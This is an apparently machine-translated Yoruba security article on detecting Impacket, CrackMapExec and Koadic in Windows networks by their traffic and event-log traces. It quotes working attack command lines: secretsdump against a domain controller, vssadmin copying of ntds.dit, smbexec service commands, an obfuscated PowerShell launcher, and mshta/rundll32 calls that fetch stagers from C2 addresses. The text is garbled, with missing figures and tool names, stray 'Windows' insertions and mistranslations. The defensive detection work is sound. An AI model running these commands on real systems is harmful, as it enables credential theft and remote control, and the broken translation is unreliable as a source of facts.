Nọmba awọn ikọlu ni eka ile-iṣẹ n dagba ni gbogbo ọdun: fun apẹẹrẹ ju ni 2016, ati ni opin 2018 - , ju ti àsìkò tó kọjá lọ. Pẹ̀lú àwọn tí ètò ìṣiṣẹ́ jẹ́ irinṣẹ́ pàtàkì WindowsNí ọdún 2017 sí 2018, APT Dragonfly, APT28, Ti ṣe ikọlu si ijọba ati awọn ẹgbẹ ologun ni Yuroopu, Ariwa America ati Saudi Arabia. Ati pe a lo awọn irinṣẹ mẹta fun eyi - , и . Koodu orisun wọn wa ni sisi ati wa lori GitHub.
O tọ lati ṣe akiyesi pe awọn irinṣẹ wọnyi ko lo fun ilaluja akọkọ, ṣugbọn lati ṣe idagbasoke ikọlu laarin awọn amayederun. Awọn ikọlu lo wọn ni awọn ipele oriṣiriṣi ti ikọlu ni atẹle ilaluja agbegbe naa. Eyi, nipasẹ ọna, ṣoro lati ṣawari ati nigbagbogbo nikan pẹlu iranlọwọ ti imọ-ẹrọ tabi awọn irinṣẹ ti o gba laaye . Awọn irinṣẹ pese awọn iṣẹ oriṣiriṣi, lati gbigbe awọn faili si ibaraenisepo pẹlu iforukọsilẹ ati ṣiṣe awọn aṣẹ lori ẹrọ latọna jijin. A ṣe iwadii awọn irinṣẹ wọnyi lati pinnu iṣẹ ṣiṣe nẹtiwọọki wọn.
Ohun ti a nilo lati ṣe:
- Loye bi awọn irinṣẹ gige sakasaka ṣiṣẹ. Wa ohun ti awọn ikọlu nilo lati lo nilokulo ati kini awọn imọ-ẹrọ ti wọn le lo.
- Wa ohun ti a ko rii nipasẹ awọn irinṣẹ aabo alaye ni awọn ipele akọkọ ti ikọlu. A le fo alakoso atunṣe, boya nitori ẹniti o kọlu jẹ olukolu inu, tabi nitori pe olukolu naa nlo iho kan ninu awọn amayederun ti a ko mọ tẹlẹ. O ṣee ṣe lati mu pada gbogbo pq ti awọn iṣe rẹ pada, nitorinaa ifẹ lati rii gbigbe siwaju.
- Yọ awọn idaniloju eke kuro lati awọn irinṣẹ wiwa ifọle. A ko gbọdọ gbagbe pe nigbati a ba rii awọn iṣe kan lori ipilẹ atunyẹwo nikan, awọn aṣiṣe loorekoore ṣee ṣe. Nigbagbogbo ninu awọn amayederun awọn ọna ti o to, ko ṣe iyatọ si awọn ti o tọ ni iwo akọkọ, lati gba alaye eyikeyi.
Kini awọn irinṣẹ wọnyi fun awọn ikọlu? Ti eyi ba jẹ Impacket, lẹhinna awọn ikọlu gba ile-ikawe nla ti awọn modulu ti o le ṣee lo ni awọn ipele oriṣiriṣi ti ikọlu ti o tẹle lẹhin fifọ agbegbe naa. Ọpọlọpọ awọn irinṣẹ lo awọn modulu Impacket ni inu - fun apẹẹrẹ, Metasploit. O ni dcomexec ati wmiexec fun pipaṣẹ pipaṣẹ latọna jijin, asiri fun gbigba awọn akọọlẹ lati iranti ti o ṣafikun lati Impacket. Bi abajade, wiwa deede ti iṣẹ ṣiṣe ti iru ile-ikawe kan yoo rii daju wiwa awọn itọsẹ.
Kii ṣe lasan pe awọn olupilẹṣẹ kowe “Agbara nipasẹ Impacket” nipa CrackMapExec (tabi CME larọwọto). Ni afikun, CME ni iṣẹ ṣiṣe ti a ṣe fun awọn oju iṣẹlẹ olokiki: Mimikatz fun gbigba awọn ọrọ igbaniwọle tabi hashes wọn, imuse ti Meterpreter tabi aṣoju ijọba fun ipaniyan latọna jijin, ati Bloodhound lori ọkọ.
Ohun èlò kẹta tí a yàn ni Koadic. Ó jẹ́ tuntun díẹ̀, tí a gbé kalẹ̀ ní ìpàdé àwọn agbóhùnsáfẹ́fẹ́ kárí ayé DEFCON 25 ní ọdún 2017, ó sì ní ọ̀nà tí kò báramu: ó ń ṣiṣẹ́ nípasẹ̀ HTTP, JavaScript, àti Microsoft Visual Basic Script (VBS). Ọ̀nà yìí ni a ń pè ní gbígbé ní ilẹ̀: ohun èlò náà ń lo àwọn ìgbẹ́kẹ̀lé àti àwọn ilé ìkàwé tí a kọ́ sínú rẹ̀. WindowsÀwọn olùdásílẹ̀ pè é ní COM Command & Control, tàbí C3.
IMPACKET
Iṣẹ́ Impacket gbòòrò gan-an, láti ìwádìí nínú AD àti ìkójọ dátà láti inú àwọn olupin MS SQL sí àwọn ọ̀nà láti gba àwọn ìwé ẹ̀rí, títí kan ìkọlù SMB relay àti gbígbà fáìlì ntds.dit tí ó ní àwọn hashes ọ̀rọ̀ ìpamọ́ olùlò láti ọ̀dọ̀ olùdarí domain kan. Impacket tún ń ṣe àwọn àṣẹ láti ọ̀nà jíjìn nípa lílo ọ̀nà mẹ́rin ọ̀tọ̀ọ̀tọ̀: WMI, iṣẹ́ ìṣàkóso scheduler, àti bẹ́ẹ̀ bẹ́ẹ̀ lọ. Windows, DCOM àti SMB, ó sì nílò ìwé ẹ̀rí láti ṣe èyí.
Asiri
Jẹ ká ya a wo ni secretsdump. Eyi jẹ module ti o le dojukọ awọn ẹrọ olumulo mejeeji ati awọn oludari agbegbe. O le ṣee lo lati gba awọn ẹda ti awọn agbegbe iranti LSA, SAM, SECURITY, NTDS.dit, nitorinaa o le rii ni awọn ipele oriṣiriṣi ti ikọlu naa. Igbesẹ akọkọ ninu iṣiṣẹ module jẹ ijẹrisi nipasẹ SMB, eyiti o nilo boya ọrọ igbaniwọle olumulo tabi hash rẹ lati gbe ikọlu Hash naa kọja laifọwọyi. Nigbamii ti ibeere kan wa lati ṣii iraye si Oluṣakoso Iṣakoso Iṣẹ (SCM) ati ni iraye si iforukọsilẹ nipasẹ ilana winreg, lilo eyiti ikọlu le wa data ti awọn ẹka anfani ati gba awọn abajade nipasẹ SMB.
Ninu Ọpọtọ. 1 a rii bii gangan nigba lilo ilana winreg, iraye si ni lilo bọtini iforukọsilẹ pẹlu LSA kan. Lati ṣe eyi, lo aṣẹ DCERPC pẹlu opcode 15 - OpenKey.
Iresi. 1. Ṣii bọtini iforukọsilẹ nipa lilo ilana winreg
Nigbamii ti, nigbati iraye si bọtini ba gba, awọn iye ti wa ni fipamọ pẹlu aṣẹ SaveKey pẹlu opcode 20. Impacket ṣe eyi ni ọna kan pato. O fipamọ awọn iye si faili ti orukọ rẹ jẹ okun ti awọn ohun kikọ laileto 8 ti a fikun pẹlu .tmp. Ni afikun, gbigbe siwaju sii ti faili yii waye nipasẹ SMB lati ilana System32 (Fig. 2).
Iresi. 2. Eto fun gbigba bọtini iforukọsilẹ lati ẹrọ latọna jijin
O wa ni pe iru iṣẹ bẹ lori nẹtiwọọki le ṣee wa-ri nipasẹ awọn ibeere si awọn ẹka iforukọsilẹ kan nipa lilo ilana winreg, awọn orukọ kan pato, awọn aṣẹ ati aṣẹ wọn.
Módùùlù yìí tún fi àmì sílẹ̀ nínú àkọsílẹ̀ ìṣẹ̀lẹ̀ náà. Windows, nítorí èyí tí a fi rọrùn láti rí i. Fún àpẹẹrẹ, nítorí ṣíṣe àṣẹ náà
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCninu iwe iroyin Windows Server 2016 yoo ri awọn atẹle pataki ti awọn iṣẹlẹ:
1. 4624 - latọna Logon.
2. 5145 - ṣayẹwo awọn ẹtọ wiwọle si iṣẹ latọna jijin winreg.
3. 5145 - ṣayẹwo awọn ẹtọ wiwọle faili ni System32 liana. Faili naa ni orukọ laileto ti a mẹnuba loke.
4 - ṣiṣẹda ilana cmd.exe ti o ṣe ifilọlẹ vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - ṣiṣẹda ilana pẹlu aṣẹ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - ṣiṣẹda ilana pẹlu aṣẹ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - ṣiṣẹda ilana pẹlu aṣẹ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Bii ọpọlọpọ awọn irinṣẹ ilokulo lẹhin, Impacket ni awọn modulu fun ṣiṣe awọn pipaṣẹ latọna jijin. A yoo dojukọ smbexec, eyiti o pese ikarahun aṣẹ ibanisọrọ lori ẹrọ latọna jijin. Ẹya yii tun nilo ijẹrisi nipasẹ SMB, boya pẹlu ọrọ igbaniwọle tabi hash ọrọ igbaniwọle kan. Ninu Ọpọtọ. 3 a rii apẹẹrẹ ti bii iru irinṣẹ ṣiṣẹ, ninu ọran yii o jẹ console oludari agbegbe.
Iresi. 3. Interactive smbexec console
Igbesẹ akọkọ ti smbexec lẹhin ijẹrisi ni lati ṣii SCM pẹlu aṣẹ OpenSCManagerW (15). Ibeere naa jẹ ohun akiyesi: aaye MachineName jẹ DUMMY.
Iresi. 4. Beere lati ṣii Oluṣakoso Iṣakoso Iṣẹ
Nigbamii ti, iṣẹ naa ti ṣẹda nipa lilo aṣẹ CreateServiceW (12). Ninu awọn idi ti smbexec, a le ri kanna pipaṣẹ ikole kannaa ni gbogbo igba ti. Ninu Ọpọtọ. 5 alawọ ewe tọkasi awọn paramita aṣẹ ti ko yipada, ofeefee tọkasi kini ikọlu le yipada. O rọrun lati rii pe orukọ faili ti o le ṣiṣẹ, itọsọna rẹ ati faili ti o wujade le yipada, ṣugbọn iyokù jẹ pupọ sii nira pupọ lati yipada laisi idamu ọgbọn ti module Impacket.
Iresi. 5. Beere lati ṣẹda iṣẹ kan nipa lilo Oluṣakoso Iṣakoso Iṣẹ
Smbeexec tun fi awọn ami ti o han gbangba silẹ ninu akọọlẹ iṣẹlẹ naa. WindowsNínú ìwé ìròyìn náà Windows Server Ní ọdún 2016 fún ikarahun àṣẹ ìbánisọ̀rọ̀ pẹ̀lú àṣẹ ipconfig, a rí ìtẹ̀léra pàtàkì àwọn ìṣẹ̀lẹ̀ wọ̀nyí:
1 - fifi sori ẹrọ iṣẹ lori ẹrọ olufaragba:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat 2 - ṣiṣẹda ilana cmd.exe pẹlu awọn ariyanjiyan lati aaye 4688.
3. 5145 - ṣayẹwo awọn ẹtọ wiwọle si faili __jade ninu iwe ilana C $.
4. 4697 - fifi sori ẹrọ ti iṣẹ lori ẹrọ olufaragba.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat 5 - ṣiṣẹda ilana cmd.exe pẹlu awọn ariyanjiyan lati aaye 4688.
6. 5145 - ṣayẹwo awọn ẹtọ wiwọle si faili __jade ninu iwe ilana C $.
Impacket jẹ́ ìlànà fún ṣíṣe àwọn irinṣẹ́ ìkọlù. Ó ń ṣe àtìlẹ́yìn fún gbogbo àwọn ìlànà ní Windows-infrastructure síbẹ̀ ó ní àwọn ẹ̀yà ara rẹ̀ tó yàtọ̀. Àwọn wọ̀nyí ní àwọn ìbéèrè winreg pàtó kan, lílo SCM API pẹ̀lú ìlànà àṣẹ tirẹ̀, ìrísí orúkọ fáìlì, àti SMB pín SYSTEM32.
CRACKMAPEXEC
Ọpa CME jẹ apẹrẹ ni akọkọ lati ṣe adaṣe awọn iṣe ṣiṣe deede ti ikọlu ni lati ṣe lati ni ilọsiwaju laarin nẹtiwọọki naa. O faye gba o lati ṣiṣẹ ni apapo pẹlu awọn daradara-mọ Empire oluranlowo ati Meterpreter. Lati ṣiṣẹ awọn aṣẹ ni ikọkọ, CME le pa wọn mọ. Lilo Bloodhound (ọpa isọdọtun lọtọ), ikọlu le ṣe adaṣe wiwa fun igba alabojuto agbegbe ti nṣiṣe lọwọ.
Bloodhound
Bloodhound, gẹgẹbi ohun elo adaduro, ngbanilaaye fun atunyẹwo ilọsiwaju laarin nẹtiwọọki. O n gba data nipa awọn olumulo, awọn ẹrọ, awọn ẹgbẹ, awọn akoko ati pe a pese bi iwe afọwọkọ PowerShell tabi faili alakomeji. LDAP tabi awọn ilana ti o da lori SMB ni a lo lati gba alaye. Module iṣọpọ CME ngbanilaaye Bloodhound lati ṣe igbasilẹ si ẹrọ olufaragba, ṣiṣẹ ati gba data ti o gba lẹhin ipaniyan, nitorinaa adaṣe awọn iṣe ninu eto ati jẹ ki wọn dinku akiyesi. Ikarahun ayaworan Bloodhound ṣafihan data ti a gba ni irisi awọn aworan, eyiti o fun ọ laaye lati wa ọna kukuru lati ẹrọ ikọlu si alabojuto agbegbe.
Iresi. 6. Bloodhound Interface
Láti ṣiṣẹ́ lórí ẹ̀rọ ẹni tí ó jẹ́ aláìlera, módúùlù náà ṣẹ̀dá iṣẹ́ kan nípa lílo ATSVC àti SMB. ATSVC jẹ́ ojú-ọ̀nà fún ṣíṣiṣẹ́ pẹ̀lú olùṣètò iṣẹ́. WindowsCME lo iṣẹ́ NetrJobAdd (1) rẹ̀ láti ṣẹ̀dá àwọn iṣẹ́ lórí nẹ́tíwọ́ọ̀kì náà. Àpẹẹrẹ ohun tí modúùlù CME fi ránṣẹ́ ni a fihàn ní Àwòrán 7: ó jẹ́ ìpè àṣẹ cmd.exe àti kódù tí a ti bò mọ́lẹ̀ ní ìrísí àwọn àríyànjiyàn XML.
Eya.7. Ṣiṣẹda iṣẹ-ṣiṣe nipasẹ CME
Lẹhin ti a ti fi iṣẹ naa silẹ fun ipaniyan, ẹrọ olufaragba bẹrẹ Bloodhound funrararẹ, ati pe eyi ni a le rii ninu ijabọ naa. Module naa jẹ ijuwe nipasẹ awọn ibeere LDAP lati gba awọn ẹgbẹ boṣewa, atokọ ti gbogbo awọn ero ati awọn olumulo ni agbegbe, ati gba alaye nipa awọn akoko olumulo ti nṣiṣe lọwọ nipasẹ ibeere SRVSVC NetSessEnum.
Iresi. 8. Ngba akojọ awọn akoko ti nṣiṣe lọwọ nipasẹ SMB
Ni afikun, ifilọlẹ Bloodhound lori ẹrọ olufaragba pẹlu ṣiṣiṣẹ iṣatunṣe jẹ atẹle pẹlu iṣẹlẹ kan pẹlu ID 4688 (iṣẹda ilana) ati orukọ ilana «C:WindowsSystem32cmd.exe». Ohun ti o ṣe akiyesi nipa rẹ ni awọn ariyanjiyan laini aṣẹ:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Módù enum_avproducts jẹ́ ohun tó dùn mọ́ni ní ti iṣẹ́ àti ìṣiṣẹ́. WMI fún ọ láàyè láti gba dátà láti oríṣiríṣi nǹkan nípa lílo èdè ìbéèrè WQL. Windows, èyí tí ó jẹ́ ohun tí Módùùlù CME yìí ń lò ní pàtàkì. Ó ń ṣe ìbéèrè sí àwọn kíláàsì AntiSpywareProduct àti AntiMirusProduct nípa àwọn irinṣẹ́ ààbò tí a fi sórí ẹ̀rọ olùfaragbá. Láti gba dátà tí a nílò, Módùùlù náà so mọ́ ibi orúkọ rootSecurityCenter2, lẹ́yìn náà ó ń ṣe ìbéèrè WQL ó sì ń gba ìdáhùn. Àwòrán 9 fi àkóónú irú ìbéèrè àti ìdáhùn bẹ́ẹ̀ hàn. Nínú àpẹẹrẹ wa, Windows Olugbeja.
Iresi. 9. Iṣẹ nẹtiwọki ti enum_avproducts module
Nigbagbogbo, iṣayẹwo WMI (Trace WMI-Activity), ninu eyiti awọn iṣẹlẹ rẹ le wa alaye to wulo nipa awọn ibeere WQL, le jẹ alaabo. Ṣugbọn ti o ba ti ṣiṣẹ, lẹhinna ti iwe afọwọkọ enum_avproducts ba ṣiṣẹ, iṣẹlẹ kan pẹlu ID 11 yoo wa ni fipamọ. Yoo ni orukọ olumulo ti o firanṣẹ ibeere naa ati orukọ ninu aaye orukọ rootSecurityCenter2.
Olukuluku awọn modulu CME ni awọn ohun-ọṣọ tirẹ, jẹ awọn ibeere WQL kan pato tabi ṣiṣẹda iru iṣẹ-ṣiṣe kan ninu oluṣeto iṣẹ-ṣiṣe pẹlu obfuscation ati iṣẹ-ṣiṣe kan pato Bloodhound ni LDAP ati SMB.
KOADIC
Ohun pàtàkì kan tí Koadic lè ṣe ni lílo ohun tí a fi sínú rẹ̀ Windows Àwọn olùtumọ̀ JavaScript àti VBScript. Ní ìtumọ̀ yìí, ó tẹ̀lé àṣà gbígbé ní ilẹ̀—ìyẹn ni pé, kò ní ìgbẹ́kẹ̀lé láti òde ara rẹ̀, ó sì ń lo àwọn irinṣẹ́ tí ó wọ́pọ̀. WindowsOhun èlò Command & Control (CnC) ni èyí, nítorí pé lẹ́yìn àkóràn, a fi “ìfisí” kan sí orí ẹ̀rọ náà, èyí tí yóò jẹ́ kí a lè ṣàkóso rẹ̀. Irú ẹ̀rọ bẹ́ẹ̀, gẹ́gẹ́ bí ọ̀rọ̀ Koadic, ni a ń pè ní “zombie.” Tí ẹni tí ó farapa kò bá ní àǹfààní tó láti ṣiṣẹ́ dáadáa, Koadic lè gbé wọn ga nípa lílo àwọn ọ̀nà ìdènà UAC.
Iresi. 10. Koadic ikarahun
Olufaragba gbọdọ bẹrẹ ibaraẹnisọrọ pẹlu Aṣẹ & olupin Iṣakoso. Lati ṣe eyi, o nilo lati kan si URI ti a ti pese tẹlẹ ati gba ara Koadic akọkọ nipa lilo ọkan ninu awọn ipele. Ninu Ọpọtọ. Nọmba 11 fihan apẹẹrẹ fun olutẹtẹ mshta.
Iresi. 11. Bibẹrẹ igba pẹlu olupin CnC
Da lori iyipada idahun WS, o han gbangba pe ipaniyan waye nipasẹ WScript.Shell, ati awọn oniyipada STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ni alaye pataki nipa awọn aye ti igba lọwọlọwọ. Eyi ni orisii idahun ibeere akọkọ ni asopọ HTTP pẹlu olupin CnC kan. Awọn ibeere atẹle ni o ni ibatan taara si iṣẹ ṣiṣe ti awọn modulu ti a pe (awọn aranmo). Gbogbo awọn modulu Koadic ṣiṣẹ nikan pẹlu igba ti nṣiṣe lọwọ pẹlu CnC.
Mimikatz
Gẹgẹ bi CME ti n ṣiṣẹ pẹlu Bloodhound, Koadic ṣiṣẹ pẹlu Mimikatz bi eto lọtọ ati pe o ni awọn ọna lọpọlọpọ lati ṣe ifilọlẹ. Ni isalẹ ni bata-idahun ibeere fun gbigbajade ifinumọ Mimikatz.
Iresi. 12. Gbigbe Mimikatz si Koadic
O le wo bii ọna kika URI ninu ibeere ti yipada. O ni bayi ni iye kan fun oniyipada csrf, eyiti o jẹ iduro fun module ti o yan. Máṣe fiyesi orukọ rẹ̀; Gbogbo wa mọ pe CSRF nigbagbogbo loye yatọ. Idahun naa jẹ ara akọkọ ti Koadic, eyiti koodu ti o ni ibatan si Mimikatz ti ṣafikun. O tobi pupọ, nitorinaa jẹ ki a wo awọn aaye pataki. Nibi a ni iwe-ikawe Mimikatz ti a fi koodu si ni base64, kilasi .NET serialized ti yoo fun u, ati awọn ariyanjiyan lati ṣe ifilọlẹ Mimikatz. Abajade ipaniyan ti tan kaakiri lori nẹtiwọọki ni ọrọ mimọ.
Iresi. 13. Abajade ti nṣiṣẹ Mimikatz lori ẹrọ latọna jijin
Exec_cmd
Koadic tun ni awọn modulu ti o le ṣiṣẹ awọn aṣẹ latọna jijin. Nibi a yoo rii ọna iran URI kanna ati sid faramọ ati awọn oniyipada csrf. Ninu ọran ti module exec_cmd, koodu ti wa ni afikun si ara ti o lagbara lati ṣiṣẹ awọn aṣẹ ikarahun. Ni isalẹ jẹ afihan iru koodu ti o wa ninu idahun HTTP ti olupin CnC.
Iresi. 14. afisinu koodu exec_cmd
Oniyipada GAWTUUGCFI pẹlu abuda WS ti o faramọ ni a nilo fun ipaniyan koodu. Pẹlu iranlọwọ rẹ, ifibọ naa n pe ikarahun naa, ṣiṣe awọn ẹka meji ti koodu - shell.exec pẹlu ipadabọ ṣiṣan data ti o jade ati shell.run laisi pada.
Koadic kii ṣe ohun elo aṣoju, ṣugbọn o ni awọn ohun-ọṣọ tirẹ nipasẹ eyiti o le rii ni ijabọ ẹtọ:
- idasile pataki ti awọn ibeere HTTP,
- lilo winHttpRequests API,
- ṣiṣẹda ohun WScript.Shell nipasẹ ActiveXObject,
- ti o tobi executable body.
A ti bẹ̀rẹ̀ ìsopọ̀ àkọ́kọ́ láti ọwọ́ stager, nítorí náà ó ṣeé ṣe láti rí ìṣiṣẹ́ rẹ̀ nípasẹ̀ àwọn ìṣẹ̀lẹ̀. WindowsFún mshta, èyí ni ìṣẹ̀lẹ̀ 4688, èyí tí ó tọ́ka sí ìṣẹ̀dá ilana kan pẹ̀lú ànímọ́ ìbẹ̀rẹ̀:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Lakoko ti Koadic nṣiṣẹ, o le rii awọn iṣẹlẹ 4688 miiran pẹlu awọn abuda ti o ṣe apejuwe rẹ ni pipe:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1awari
Àṣà gbígbé ní ilẹ̀ òkèèrè ń gbajúmọ̀ láàárín àwọn ọ̀daràn. Wọ́n ń lo àwọn ohun èlò tí a fi sínú rẹ̀. Windows Àwọn irinṣẹ́ àti ìlànà fún àìní wọn. A rí àwọn irinṣẹ́ tó gbajúmọ̀ bíi Koadic, CrackMapExec, àti Impacket, tí wọ́n ń tẹ̀lé ìlànà yìí, tí wọ́n ń farahàn nínú àwọn ìròyìn APT. Iye àwọn irinṣẹ́ wọ̀nyí lórí GitHub tún ń pọ̀ sí i, àwọn tuntun sì ń farahàn (wọ́n wà ní nǹkan bí ẹgbẹ̀rún kan nínú wọn lọ́wọ́lọ́wọ́). Ìṣẹ̀lẹ̀ yìí ń gbajúmọ̀ nítorí ìrọ̀rùn rẹ̀: àwọn olùkọlù kò nílò àwọn irinṣẹ́ ẹni-kẹta; wọ́n ti wà lórí àwọn ẹ̀rọ àwọn olùfaragbá, wọ́n sì ń ràn wọ́n lọ́wọ́ láti borí àwọn ìgbésẹ̀ ààbò. A dojúkọ kíkẹ́kọ̀ọ́ nípa ìbáṣepọ̀ nẹ́tíwọ́ọ̀kì: irinṣẹ́ kọ̀ọ̀kan tí a ṣàlàyé lókè fi àmì tirẹ̀ sílẹ̀ nínú ìjáde nẹ́tíwọ́ọ̀kì; kíkẹ́kọ̀ọ́ wọn ní kíkún jẹ́ kí a kọ́ ọjà wa. ṣawari wọn, eyiti o ṣe iranlọwọ nikẹhin lati ṣe iwadii gbogbo pq ti awọn iṣẹlẹ cyber ti o kan wọn.
onkọwe:
- Anton Tyurin, Ori ti Ẹka Awọn iṣẹ Amoye, Ile-iṣẹ Aabo Amoye PT, Awọn Imọ-ẹrọ Rere
- Egor Podmokov, iwé, Ile-iṣẹ Aabo Amoye PT, Awọn Imọ-ẹrọ Rere
orisun: www.habr.com
